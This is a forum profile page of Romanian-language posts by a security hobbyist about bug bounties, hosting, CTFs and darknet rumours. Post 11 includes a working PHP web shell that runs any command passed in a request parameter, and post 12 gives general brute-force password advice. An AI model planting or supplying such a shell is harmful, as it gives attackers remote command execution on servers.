Jump to content

0xStrait

Active Members
  • Content Count

    167
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by 0xStrait

  1. Rog cei care au posibilitate sa "imortalizeze" conferinta si sa uploadeze pe o platforma de streaming, din pacate nu o sa pot sa fiu prezent
  2. Interesant! Am creeat si eu un tool asemanator, dar mai complex. Cei care practicati BB sau sunteti interesati si aveti idei noi putem sa automatizam tot procesul de recon. Ca sa incurajam tinerii il vom face public. Cine este interesat?
  3. Ti-as recomanda sa iti iei un job part-time (25 ore/sapt) si asa o sa ai timp de BB, e cam riscant sa incepi direct full-time BB si sa lucrezi sub presiune ca sa-ti faci banii de "supravietuire". In acelasi timp iti recomand sa-ti faci si un blog si sa incepi sa scri despre vuln pe care le vei gasi, in modul asta chiar daca nu faci foarte multi bani din BB, o sa te abordeze o companie mica/mare. Cel putin metoda asta a functionat la mine Succes!
  4. Nope, port scanning nu e out of scope. ("Out of scope" e termenul folosit domeniilor pentru care nu primesti recompensa sau domenilor pe care nu ai voie sa faci teste, in unele cazuri poti raporta vulnerabilitati si acolo ca sa faci rep, dar nu vei primi reward) Te poti folosi de orice in BB, poti raporta chiar si 0day dar regula ca sa primesti reward este sa treaca 30 zile de la publicarea 0day-ului sau in cazul in care tu gasesti un 0day poti sa-l raportezi mai multor site-uri care au program BB dupa care sa-l faci public. Sau sa nu te complici cu BB si sa-l vinzi pe zerodium.
  5. Cum zice Nytro, daca faci BB nu e nevoie de VPN. Apropo, ia-ti server de la Digitalocean nu o sa ai probleme cu port scanning / content-discovery / bruteforce. Daca esti interesat, lasa-mi pm o sa-ti dau link-ul meu de referral si primesti $50 ,eu la randul meu o sa primesc $20 credit, daca tin bine minte. Succes!
  6. E tare tipul, a luat vreo $30k. Asta a luat $70k de la Yahoo si mai e un indian care a luat $100k de la Apple pentru account takeover. Toate vulnerabilitatiile fiind WEB APP.
  7. Ce e 404 hidden shell? Daca e cum zici tu lasa link-ul complet cu parametrul. Aia e pagina default de la apache...
  8. Digitalocean lafel 100% uptime aproximativ 2 ani, tin pe el un wordpress si il folosesc la teste uneori. Bine... pretul difera.
  9. Mi se pare super ideea, daca s-ar potrivi timpul incat sa fiu liber, mi-ar placea sa particip la un CTF. Ca si platforme pt. conferinta se pot folosii Microsoft Team, BlueJeans sau cel mai rau caz Skype (toate platformele mentionate le-am intalnit in timpul interviurilor si au fost OK). Ca si idee de subiect ar fi: "Metodologia unui pentester roman" zic roman pentru ca sunt curios cum abordeaza un roman situatia, fiecare nationalitate are un anume stil, de ex: indienii se focuseaza mai multe pe partea de bruteforce tot ce tine legat de (asset discovery, auth bypass, token, etc
  10. @makav3li mane daca ai inceput discutia du-o pana la capat, care-s forum-urile alea unde se gasesc exploit-uri si chestii private care tin de securitate si nu se gasesc pe motoarele de cautare care indexeaza? Stiu doua printre cele mai mari care au fost inchise de catre FBI, dark0de si omerta, pe ambele se vindeau dr*gs si nu se faceau livrari doar in tarile mai permisive (USA, Olanda, UK, Germania si probabil alte tari nordice), conturi de diferite platforme si medicamente care in mod normal aveai nevoie de reteta, in nici-un caz asasinari, p0rn0grafie si cacaturi cum zic toti ^vl
  11. 0xStrait

    Atac flood

    @Bunicu2 urca un fisier /test.txt cu mesajul rstforums.com sa ne demonstrezi ca e forum-ul tau si daca am timp iti fac un test... dar pariez ca pica la chestii simple cum ar fi o lista de proxy-uri care acceseaza simulat forum-ul // sau urca test.php si lasa link =)))) <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
  12. Descarca asta sau incearca o alta alternativa care face acelasi lucru (bruteforce), mai ai nevoie de un wordlist. Ca sa cresti sansele de succes, trebuie sa analizezi indiciile (daca ai), sa cauti / creezi un wordlist custom in functie de limba, tipologie, hobbies and shit. Oricum nu e garantat 100% ca o sa reusesti. Succes! // Sper ca asta nu se catalogeaza ca idei de frauda, e pur educational. E nevoie de chestia aia cu "pe propria raspundere" ?
  13. © 2017 All Rights Reserved Terms of Use Privacy Policy No-Spam Policy wtf?
  14. De ce sa te complici cu asta? Ce sa mai faca vedetele care au 100k conturi false? Totul depinde de inteligenta oamenilor care o inconjoara pe sora ta, daca ei sunt atat de slab pregatiti incat sa nu recunoasca un cont fals, atunci sorry. Legea atractiei -> daca acorzi atentie chestiilor de genul asta, asta o sa atragi. Pur si simplu trebuie ignorat totul, daca te complici cu declaratii si dosare, la cum se misca lucrurile in ro o sa ai batai si mai mari de cap. Succes!
  15. @grandson, daca virusul e construit pentru Windows nu v-a afecta si Iphone-ul care foloseste un alt sistem de operare (iOS).
  16. Te referi la faptul ca (,) Chrome detecteaza si raporteaza mai departe? Daca la aste te referi, raspunsul este nu.
  17. Felicitari! Triage & reward time? Sunt curios cat de repede se misca
  18. 0xStrait

    Bug Bounty

    @mDOS, frustrant... cred ca o buna parte din reusita se datoreaza perseverentei. Uneori o pauza de 1-2 zile ridica moralul. @BiosHell, ne impartasesti si tu din experientele tale?
  19. 0xStrait

    Bug Bounty

    Sunt mai multi interesati, cel putin cunosc 3-4 de pe acest forum. Mai bine discutatm aici... sunt sanse mai mari sa atragem interes si alte persoane dornice sa schimbe idei/tips/tricks/writeups. @mDOS, ce platforme folosesti? The biggest bounty? Programe private? Blog/twitter?
  20. E copil nu va luati de el... @onlyz69 sau @GeorgeZ... era un proverb. "Nu ai cum sa vinzi castraveti gradinarului" sau cum plm era. Mai bine invata lucruri care te ajuta. Am mai zis-o intr-un post, sunt copii de 15-16 ani care fac sume ok din bug bounty, reprofileaza-te.
  21. @YKelyan, sunt 99% convins ca e fake. @aelius, sunt curios cati bani produce un site ca ala?
  22. Research Grants to support Google VRP Bug Hunters during COVID-19 April 20, 2020 Posted by Anna Hupa, Senior Strategist, Trust & Safety at Google In 2015, we launched our Vulnerability Research Grant program, which allows us to recognize the time and efforts of security researchers, including the situations where they don't find any vulnerabilities. To support our community of security researchers and to help protect our users around the world during COVID-19, we are announcing a temporary expansion of our Vulnerability Research Grant efforts. In light of new challenges
  23. Nici eu nu joc GTA. Ai incalcat regulamentul de ai primimt ban? Care a fost motivul? Intreb asta pentru ca aparent cei de la Rockstargames ofera o recompensa pentru incorrect ban.
  24. Tipul e roman, si e in top 7 $1M hackers pe Hackerone.
  25. Toti afonii sunt Security Analyst(i) acolo, am avut 7 participanti intr-un raport si a durat ~7 luni. Le-am explicat de mai multe ori scenariul de atac, le-am facut mai multe video-ui, le-am expus metoda "without user interaction" si tot nu am ajuns la un punct comun. Aveau username gen glassofbeer, dachshund, weiner_dog...
×
×
  • Create New...